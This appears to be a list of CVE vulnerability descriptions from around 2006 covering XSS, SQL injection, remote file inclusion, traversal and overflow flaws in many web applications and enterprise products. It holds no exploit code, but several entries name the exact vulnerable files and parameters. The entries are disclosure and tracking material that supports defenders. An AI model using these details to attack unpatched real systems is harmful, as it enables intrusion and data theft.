Multiple unspecified vulnerabilities in Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 have unknown impact and attack vectors, related to (1) an Immediate Image Overwrite (IIO) error message at the Local User Interface (LUI) if overwrite fails, (2) an IIO failure when a Held Job is deleted, and (3) an On Demand Image Overwrite failure when the overwrite is greater than 2 Gb.
The httpd.conf file in Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 configures port 443 to be always active, which has unknown impact and remote attack vectors.
The SNMP Agent in Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 returns no error for a non-writable object, which has unknown impact and attack vectors.  NOTE: due to the vagueness of the advisory, it is not clear whether this is a vulnerability, or a bug in a security feature.
Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 do not block the postgres port (5432/tcp), which has unknown impact and remote attack vectors, probably related to unauthorized connections to a PostgreSQL daemon.
Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 do not check the Fully Qualified Domain Name (FQDN) during a "Validate Repository SSL Certificate" scan, which has unknown impact and attack vectors, possibly related to spoofed certificates.
Multiple cross-site scripting (XSS) vulnerabilities in WBmap.php in WikyBlog 1.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) key, (2) d, (3) l, or (4) v parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: CVE disputes the l vector because l is validated by ctype_alpha before use.
execInBackground.php in J-OWAMP Web Interface 2.1b and earlier allows remote attackers to execute arbitrary commands via shell metacharacters to the (1) exe and (2) args parameters, which are used in an exec function call.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Vt-Forum Lite 1.3 and earlier store sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/forum.mdb.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in Vt-Forum Lite 1.3 and earlier allow remote attackers to execute arbitrary SQL commands via the user parameter to vf_memberdetail.asp, and other unspecified vectors.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in iWare Professional 5.0.4, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the D parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Stack-based buffer overflow in Nostra DivX Player 2.1, 2.2.00.0, and possibly earlier, allows remote attackers to execute arbitrary code via a long string in an M3U file.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in the Novell Distributed Print Services (NDPS) Print Provider for Windows component (NDPPNT.DLL) in Novell Client 4.91 has unknown impact and remote attack vectors.
Unspecified vulnerability in the Web User Interface in Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 allows remote attackers to bypass authentication controls via unknown vectors.
Agileco AgileBill 1.4.x and AgileVoice 1.4.x do not properly handle certain proxy requests, which allows remote attackers to disable the application by entering invalid license data on a form, possibly involving modules/core/license.inc.php.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in jce.php in the JCE Admin Component in Ryan Demmer Joomla Content Editor (JCE) 1.1.0 beta 2 and earlier for Joomla! (com_jce) allow remote attackers to inject arbitrary web script or HTML via the (1) img, (2) title, (3) w, or (4) h parameter, different vectors than CVE-2006-6166.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
jce.php in the JCE Admin Component in Ryan Demmer Joomla Content Editor (JCE) 1.1.0 beta 2 and earlier for Joomla! (com_jce) allows remote attackers to include and possibly execute arbitrary local files via the (1) plugin or (2) file parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in PhpLeague - Univert PhpLeague 0.81 allow remote attackers to execute arbitrary PHP code via a URL in the cheminmini parameter to (1) consult/miniseul.php or (2) config.php.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in dettaglio.asp in dol storye allow remote attackers to execute arbitrary SQL commands via the (1) id_doc or (2) id_aut parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in Superfreaker Studios UPublisher 1.0 allows remote attackers to execute arbitrary SQL commands via the Username parameter in login.asp.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
Directory traversal vulnerability in index.php in plx Web Studio (aka plxWebDev) plx Pay 3.2 and earlier allows remote attackers to include and execute arbitrary local files, or obtain user credentials and other sensitive information, via a .. (dot dot) in the read parameter. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple directory traversal vulnerabilities in Open Solution Quick.Cart 2.0, when register_globals is enabled and magic_quotes_gpc is disabled, allow remote attackers to include arbitrary files via a .. (dot dot) in the config[db_type] parameter to (1) actions_admin/other.php and (2) actions_client/gallery.php.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in naprednaPretraga.php in LINK Content Management Server (CMS) allows remote attackers to inject arbitrary web script or HTML via the txtPretraga parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in LINK Content Management Server (CMS) allow remote attackers to execute arbitrary SQL commands via the (1) IDMeniGlavni parameter to navigacija.php, and the (2) IDStranicaPodaci parameter to prikazInformacije.php.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
The control panel for Positive Software H-Sphere before 2.5.0 RC3 creates log files in a user's directory with insecure permissions, which allows local users to append log data to arbitrary files via a symlink attack.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in pbguestbook.php in JAB Guest Book 20061205 allow remote attackers to inject arbitrary web script or HTML via the (1) topic or (2) message parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in includes/elements/spellcheck/spellwin.php in Cerberus Helpdesk 0.97.3, 2.0 through 2.7, 3.2.1, and 3.3 allows remote attackers to inject arbitrary web script or HTML via the js parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in templates/cat_temp.php in PHPNews 1.3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Neocrome Seditio 1.10 and earlier have unknown impact and attack vectors related to (1) plugins/ipsearch/ipsearch.admin.php, and (2) pfs/pfs.edit.inc.php, (3) users/users.register.inc.php in system/core.  NOTE: the users.profile.inc.php vector is identified by CVE-2006-6177.  NOTE: these issues might be related to SQL injection.
Microsoft Internet Explorer 6.0 SP1 and earlier allows remote attackers to cause a denial of service (crash) via an invalid src attribute value ("?") in an HTML frame tag that is in a frameset tag with a large rows attribute.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Palm Desktop 4.1.4 and earlier stores user data with weak permissions under the application directory, which allows local users to obtain sensitive information (address books, calendar files, and todo lists of other users) via unspecified vectors.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Sorin Chitu Telnet-FTP Server 1.0 allows remote authenticated users to cause a denial of service (crash) via consecutive RETR commands.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in Sorin Chitu Telnet-FTP Server 1.0 allows remote authenticated users to list contents of arbitrary directories and download arbitrary files via a .. (dot dot) sequence in an FTP command argument, as demonstrated by RETR (GET) or STOR (PUT).  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the Downloads module for unknown versions of PostNuke allows remote attackers to execute arbitrary SQL commands via the lid parameter in a viewdownloaddetails operation. NOTE: this issue might have been in the viewdownloaddetails function in dl-downloaddetails.php, but PostNuke 0.764 does not appear to have this issue.
Cross-site scripting (XSS) vulnerability in Codewalkers ltwCalendar (aka PHP Event Calendar) before 4.2.1 allows remote attackers to inject arbitrary HTML or web script via unknown vectors.
PHP remote file inclusion vulnerability in centre.php in Site News (site_news) 2.00, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified scripts in the admin directory in 8pixel.net SimpleBlog 3.0 and earlier do not properly perform authentication, which allows remote attackers to add users and perform certain other unauthorized privileged actions.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in articles.asp in Expinion.net iNews Publisher (iNP) 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the hl parameter. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in PCCSRV\Web_console\RemoteInstallCGI\CgiRemoteInstall.exe for Trend Micro OfficeScan 7.3 before build 7.3.0.1089 allows remote attackers to execute arbitrary code via unknown attack vectors.
Buffer overflow in PCCSRV\Web_console\RemoteInstallCGI\Wizard.exe for Trend Micro OfficeScan 7.3 before build 7.3.0.1087 allows remote attackers to execute arbitrary code via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in tiki-edit_structures.php in TikiWiki 1.9.6 allows remote attackers to inject arbitrary web script or HTML via the pageAlias parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in Doug Luxem Liberum Help Desk 0.97.3 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id and (2) uid parameter to (a) inout/status.asp, (b) inout/update.asp, and (c) forgotpass.asp.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in auth/message.php in HIOX Star Rating System Script (HSRS) 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string (PHP_SELF).  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in addrating.php in HIOX Star Rating System Script (HSRS) 1.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) ipadd or (2) url parameter. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in centre.php in Messagerie Locale as of 20061127 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
CRYPTOCard CRYPTO-Server before 6.4.56 stores LDAP credentials in plaintext in UninstallerData\installvariables.properties, which has insecure permissions and allows local users to obtain the credentials. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in Sisfo Kampus 2006 (Semarang 3) allows remote attackers to execute arbitrary PHP code via a URL in the slnt parameter to (1) index.php and (2) print.php.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in downloadexcel.php in Sisfo Kampus 2006 (Semarang 3) allows remote attackers to read arbitrary files via the fn parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
IBM WebSphere Application Server 6.1.0 before Fix Pack 3 (6.1.0.3) does not perform EAL4 authentication checks at the proper time during "registering of response operation," which has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in IBM WebSphere Application Server 6.1.0 before Fix Pack 3 (6.1.0.3) have unknown impact and attack vectors, related to (1) a "Potential security vulnerability" (PK29725) and (2) "Potential security exposure" (PK30831).
Cross-site scripting (XSS) vulnerability in SeleniumServer Web Server 1.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in EC-CUBE before 1.0.1a-beta allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in addpost1.asp in BaalAsp forum allows remote attackers to inject arbitrary web script or HTML via the name parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in bpg/publications_list.asp in BPG-InfoTech Easy Publisher and Smart Publisher//Pro 2.7.7 allows remote attackers to execute arbitrary SQL commands via the vjob parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
QUALCOMM Eudora WorldMail 4.0 allows remote attackers to cause a denial of service, as demonstrated by a certain module in VulnDisco Pack.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information. As of 20061118, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Multiple buffer overflows in Eudora Worldmail, possibly Worldmail 3 version 6.1.22.0, have unknown impact and attack vectors, as demonstrated by the (1) "Eudora WorldMail stack overflow" and (2) "Eudora WorldMail heap overflow" modules in VulnDisco Pack.  NOTE: Some of these details are obtained from third party information. As of 20061118, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
The NetBSD-current kernel before 20061028 does not properly perform bounds checking of an unspecified userspace parameter in the ptrace system call during a PT_DUMPCORE request, which allows local users to have an unknown impact.
Cross-site scripting (XSS) vulnerability in csm/asp/listings.asp in MGinternet Car Site Manager (CSM) allows remote attackers to inject arbitrary web script or HTML via the p parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Java Runtime Environment (JRE) Swing library in JDK and JRE 5.0 Update 7 and earlier allows attackers to obtain certain information via unknown attack vectors, related to an untrusted applet accessing data in other applets.
Unspecified vulnerability in Windows 2000 Advanced Server SP4 running Active Directory allows remote attackers to cause a denial of service via unknown vectors, as demonstrated by a certain VulnDisco Pack module.  NOTE: the provenance of this information is unknown; the details are obtained from third party information. As of 20061116, this disclosure has no actionable information. However, since the VulnDisco Pack author is a reliable researcher, the disclosure is being assigned a CVE identifier for tracking purposes.
admin/options.php in Extreme CMS 0.9, and possibly earlier, does not require authentication, which might allow remote attackers to conduct unauthorized activities.  NOTE: this issue can be combined with another vulnerability to expand the scope of a cross-site scripting (XSS) attack without authentication.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
Multiple cross-site scripting (XSS) vulnerabilities in admin/options.php in Extreme CMS 0.9, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) bg1, (2) bg2, (3) text, or (4) size parameters.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
SeleniumServer FTP Server 1.0, and possibly earlier, stores user passwords in plaintext in the Servers directory, which allows attackers to obtain passwords by reading the file.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
adm_lgn_admin.asp in Renasoft NetJetServer 2.5.3.939, and possibly earlier, does not properly perform login authentication, which allows remote attackers to obtain administrative privileges.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
Renasoft NetJetServer 2.5.3.939, and possibly earlier, uses insecure permissions for Global.asa, which allows remote attackers to obtain sensitive information.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
Unspecified vulnerability in E-Xoopport before 2.2.0 has unknown impact and attack vectors, as addressed by "Some security fix."
fetchmail 6.3.5 and 6.3.6 before 6.3.6-rc4, when refusing a message delivered via the mda option, allows remote attackers to cause a denial of service (crash) via unknown vectors that trigger a NULL pointer dereference when calling the (1) ferror or (2) fflush functions.
Race condition in Panda ActiveScan 5.53.00, and other versions before 5.54.01, allows remote attackers to cause memory corruption and execute arbitrary code via unknown vectors related to multiple invocations of the Analizar method in the ActiveScan.1 ActiveX control, which is not thread safe.
Buffer overflow in Mercury Mail Transport System 4.01b for Windows has unknown impact and attack vectors, as originally reported in a GLEG VulnDisco pack.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.  The original researcher is reliable.
Unspecified vulnerability in ALTools ALFTP FTP Server 4.1 beta 1, and possibly earlier, allows remote authenticated users to obtain the installation path via unknown vectors related to the REN command, probably due to response messages.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
Directory traversal vulnerability in ALTools ALFTP FTP Server 4.1 beta 1, and possibly earlier, allows remote attackers to create arbitrary directories via directory traversal sequences in a MKD request.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
Multiple directory traversal vulnerabilities in Conxint FTP Server 2.2.0603, and possibly earlier, allow remote attackers to read arbitrary files and list arbitrary directories via directory traversal sequences in (1) DIR (LIST or NLST) and (2) GET (RETR) commands. NOTE: the provenance of this information is unknown; details are obtained from third party sources.
Unspecified vulnerability in Grisoft AVG Anti-Virus before 7.1.407 has unknown impact and remote attack vectors related to "Integer Issues" and parsing of .EXE files.
Grisoft AVG Anti-Virus before 7.1.407 has unknown impact and remote attack vectors involving an uninitialized variable and a crafted CAB file.
Multiple PHP remote file inclusion vulnerabilities in Aigaion Web based bibliography management system 1.2.1, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to certain PHP scripts in (1) lib/actions/, (2) lib/displays/, (3) lib/editforms/, (4) lib/functions/, (5) scheme/, and (6) the root directory.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
PHP remote file inclusion vulnerability in firepjs.php in Phpjobscheduler 3.0 allows remote attackers to execute arbitrary PHP code via a URL in the installed_config_file parameter.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
Cross-site scripting (XSS) vulnerability in index.php in Efficient IP iPmanager (IPm) 2.3 allows remote attackers to inject arbitrary web script or HTML via the errmsg parameter.  NOTE: the provenance of this information is unknown; details are obtained from third party sources.
Unspecified vulnerability in Campware Campsite before 2.6.2 has unknown impact and attack vectors, related to a "Security fix for you-know-what," possibly related to encrypted passwords.
Multiple unspecified vulnerabilities in DirectAnimation ActiveX controls for Microsoft Internet Explorer 5.01 through 6 have unknown impact and remote attack vectors, possibly related to (1) Danim.dll and (2) Lmrt.dll, a different set of vulnerabilities than CVE-2006-4446 and CVE-2006-4777.
Cross-site request forgery (CSRF) vulnerability in Edgewall Trac 0.10 and earlier allows remote attackers to perform unauthorized actions as other users via unknown vectors.
Multiple buffer overflows in Imagemagick 6.0 before 6.0.6.2, and 6.2 before 6.2.4.5, has unknown impact and user-assisted attack vectors via a crafted SGI image.
Directory traversal vulnerability in the session mechanism of the web interface for Network Administration Visualized (NAV) before 3.1.1 allows attackers with filesystem write access to have an unknown impact via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in the administrator console for Adobe JRun 4.0, as used in ColdFusion, allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site scripting (XSS) vulnerability in Adobe ColdFusion MX 7 7.0 and 7.0.1, when Global Script Protection is not enabled, allows remote attackers to inject arbitrary HTML and web script via unknown vectors, possibly related to Linkdirect.cfm, Topnav.cfm, and Welcomedoc.cfm.
Multiple unspecified vulnerabilities in Jonathon J. Freeman OvBB before 0.13a have unknown impact and attack vectors.
Cross-site scripting (XSS) vulnerability in default.asp in xenis.creator CMS allows remote attackers to inject arbitrary web script or HTML via the nav parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Hyper NIKKI System before 2.19.9 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
PHP remote file inclusion vulnerability in contact.php in Free File Hosting 1.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the AD_BODY_TEMP parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: this issue was later reported for the "File Upload System" which is a component of Free File Hosting.
Multiple PHP remote file inclusion vulnerabilities in Free File Hosting 1.1, and possibly earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the AD_BODY_TEMP parameter to (1) login.php, (2) register.php, or (3) send.php.  NOTE: the original provenance of this information is unknown; the details are obtained solely from third party information. NOTE: this issue was later reported for the "File Upload System" which is a component of Free File Hosting.  Vector 1 also affects Free Image Hosting 2.0, which contains the same code.
Unspecified vulnerability in the listxattr system call in Linux kernel, when a "bad inode" is present, allows local users to cause a denial of service (data corruption) and possibly gain privileges via unknown vectors.
The isdn_ppp_ccp_reset_alloc_state function in drivers/isdn/isdn_ppp.c in the Linux 2.4 kernel before 2.4.34-rc4 does not call the init_timer function for the ISDN PPP CCP reset state timer, which has unknown attack vectors and results in a system crash.
Multiple PHP remote file inclusion vulnerabilities in Segue CMS 1.5.9 and earlier, when magic_quotes_gpc is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the theme parameter to (1) themesettings.php or (2) index.php, a different vector than CVE-2006-5497.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Easy File Sharing (EFS) Web Server 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) author, (2) content, or (3) title parameters when posting a forum thread.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in WorldClient in Alt-N Technologies MDaemon before 9.50 has unknown impact and attack vectors related to a "JavaScript exploit."
Multiple unspecified vulnerabilities in Pentaho Business Intelligence (BI) Suite before 1.2 RC3 (1.2.0.470-RC3) have unknown impact and attack vectors, related to "MySQL Scripts need changes for security," possibly SQL injection vulnerabilities associated with these scripts.
PHP remote file inclusion vulnerability in contact.php in Free Image Hosting 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the AD_BODY_TEMP parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PAM_extern before 0.2 sends a password as a command line argument, which allows local users to obtain the password by listing the command line arguments, such as ps.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple off-by-one errors in src/text.c in Vilistextum before 2.6.9 have unknown impact and attack vectors.
Unspecified vulnerability in NmnLogger 1.0.0 and earlier has unknown impact and attack vectors related to configuration of mesasge drivers.
Cross-site scripting (XSS) vulnerability in change_pass.php in iG Shop 1.4 allows remote attackers to inject arbitrary web script or HTML via the id parameter, a different vulnerability than CVE-2006-5631.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in Multi-Page Comment System (MPCS) 1.0.0 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to (1) include.php or (2) functions.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
SQL injection vulnerability in pop_mail.asp in Snitz Forums 2000 3.4.06 allows remote attackers to execute arbitrary SQL commands via the RC parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
FtpXQ Server 3.0.1 installs with two default testing accounts, which allows remote attackers to read or write arbitrary files via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
CRLF injection vulnerability in MAXdev MD-Pro 1.0.76 allows remote attackers to inject arbitrary HTTP headers via a CRLF sequence in the (1) name, (2) file, (3) module, and (4) func parameters in (a) index.php; and the (5) file parameter in (b) modules.php.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in user.php in MAXdev MD-Pro 1.0.76 allows remote attackers to inject arbitrary web script or HTML via the op parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in Yahoo! Messenger (Service 18) before 8.1.0.195 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted room name in a Conference Invite.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
backend/parser/parse_coerce.c in PostgreSQL 7.4.1 through 7.4.14, 8.0.x before 8.0.9, and 8.1.x before 8.1.5 allows remote authenticated users to cause a denial of service (daemon crash) via a coercion of an unknown element to ANYARRAY.
Multiple cross-site scripting (XSS) vulnerabilities in Boesch SimpNews before 2.34.01 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) admin/index.php, (2) admin/pwlost.php, and unspecified other files.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple PHP file inclusion vulnerabilities in 2BGal 3.0 allow remote attackers to execute arbitrary PHP code via the lang parameter to (1) admin/configuration.inc.php, (2) admin/creer_album.inc.php, (3) admin/changepwd.php.inc, and unspecified other files.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple SQL injection vulnerabilities in the checkUser function in inc/DBInterface.php in XchangeBoard 1.70 and earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) userNick or (2) password parameters.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
SQL injection vulnerability in XchangeBoard 1.70, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the loginNick parameter during login.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Multiple PHP remote file inclusion vulnerabilities in 2le.net Castor PHP Web Builder 1.1.1 allow remote attackers to execute arbitrary PHP code via the rootpath parameter in (1) lib/code.php, (2) lib/dbconnect.php, (3) lib/error.php, (4) lib/menu.php, and other unspecified files.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
PHP remote file inclusion vulnerability in adminfoot.php in Comdev Web Blogger 4.1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
PHP remote file inclusion vulnerability in adminfoot.php in Comdev Form Designer 4.1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
PHP remote file inclusion vulnerability in adminfoot.php in Comdev Misc Tools 4.1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
PHP remote file inclusion vulnerability in adminfoot.php in Comdev Forum 4.1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in the search functionality in db-central (dbc) Enterprise CMS and db-central CMS allows remote attackers to inject arbitrary web script or HTML via the needle parameter.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
PHP remote file inclusion vulnerability in admin/admin_module.php in Lou Portail 1.4.1, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the g_admin_rep parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Passgo Defender 5.2 creates the application directory with insecure permissions (Everyone/Full Control), which allows local users to read and modify sensitive files.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Buffer overflow in Microsoft Class Package Export Tool (aka clspack.exe) allows context-dependent attackers to execute arbitrary code via a long string.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Unspecified vulnerability in JD Edwards HTML Server in JD Edwards EnterpriseOne SP23_O2, 8.95.P1, and 8.96.D1 has unknown impact and remote authenticated attack vectors, aka Vuln# JDE01.
Unspecified vulnerability in PeopleSoft component in Oracle PeopleSoft Enterprise 8.80 GA, 8.90 GA, 8.8 Bundle 11, and 8.9 Bundle 4 has unknown impact and remote authenticated attack vectors, aka Vuln# PSE05.
Multiple unspecified vulnerabilities in PeopleTools component in Oracle PeopleSoft Enterprise 8.22 GA, 8.46 GA, 8.47 GA, 8.48 GA, 8.22.11, 8.46.15, 8.47.09, and 8.48.03 have unknown impact and remote authenticated attack vectors, aka Vuln# (1) PSE04, (2) PSE06, (3) PSE07, and (4) PSE08.
Multiple unspecified vulnerabilities in PeopleTools component in Oracle PeopleSoft Enterprise 8.46 GA, 8.47 GA, 8.48 GA, 8.46.15, 8.47.09, and 8.48.03 have unknown impact and remote attack vectors, aka Vuln# (1) PSE01, (2) PSE02, and (3) PSE03.
Unspecified vulnerability in Oracle Pharmaceutical Applications 4.5.1 has unknown impact and remote authenticated attack vectors, aka Vuln# PHAR01.
Unspecified vulnerability in Oracle Install Base component in Oracle E-Business Suite 11.5.10CU1 has unknown impact and remote authenticated attack vectors, aka Vuln# APPS13.
Multiple unspecified vulnerabilities in Oracle E-Business Suite 11.5.10 up to 11.5.10CU2 have unknown impact and remote authenticated attack vectors, aka Vuln# (1) APPS11 for Oracle Universal Work Queue and (2) APPS12 for Oracle Application Object Library.
Unspecified vulnerability in Oracle Email Center component in Oracle E-Business Suite 11.5.9 has unknown impact and remote authenticated attack vectors, aka Vuln# APPS07.
Multiple unspecified vulnerabilities in Oracle E-Business Suite 11.5.10CU2 have unknown impact and remote authenticated attack vectors, aka Vuln# (1) APPS06 for Oracle CRM Gateway for Mobile Devices and (2) APPS08 for Oracle iStore.
Unspecified vulnerability in Oracle Application Object Library in Oracle E-Business Suite 11.5.10CU2 has unknown impact and remote authenticated attack vectors, aka Vuln# APPS02.
Unspecified vulnerability in Oracle Exchange component in Oracle E-Business Suite 6.2.4 has unknown impact and remote attack vectors, aka Vuln# APPS01.
Multiple unspecified vulnerabilities in Oracle E-Business Suite 11.5.7 up to 11.5.10CU2 have unknown impact and remote authenticated attack vectors, aka Vuln# (1) APPS03 in Oracle Applications Framework, (2) APPS04 in Oracle Applications Technology Stack, and (3) APPS05 in Oracle Balanced Scorecard, (4) APPS09 in Oracle Scripting, and (5) APPS10 in Oracle Trading Community.
Multiple unspecified vulnerabilities in Oracle Collaboration Suite 9.0.4.2 have unknown impact and remote attack vectors related to (1) Oracle Containers for J2EE, aka Vuln# OC4J01, and (2) Oracle Process Mgmt &amp; Notification, aka OPMN01.
Unspecified vulnerability in Oracle Forms in Oracle Application Server 9.0.4.3 and 10.1.2.0.2, and E-Business Suite and Applications 11.5.10CU2, has unknown impact and remote attack vectors, aka Vuln# FORM02.
Unspecified vulnerability in Oracle Containers for J2EE component in Oracle Application Server 9.0.4.1 and 10.1.2.0.2, and Collaboration Suite 10.1.2, has unknown impact and remote authenticated attack vectors, aka Vuln# OC4J05.
Unspecified vulnerability in Oracle Single Sign-On component in Oracle Application Server 10.1.2.0.1 and Collaboration Suite 10.1.2 has unknown impact and remote attack vectors, aka Vuln# SSO02.
Unspecified vulnerability in Oracle Containers for J2EE component in Oracle Application Server 10.1.3.0.0 has unknown impact and remote attack vectors, aka Vuln# OC4J04.
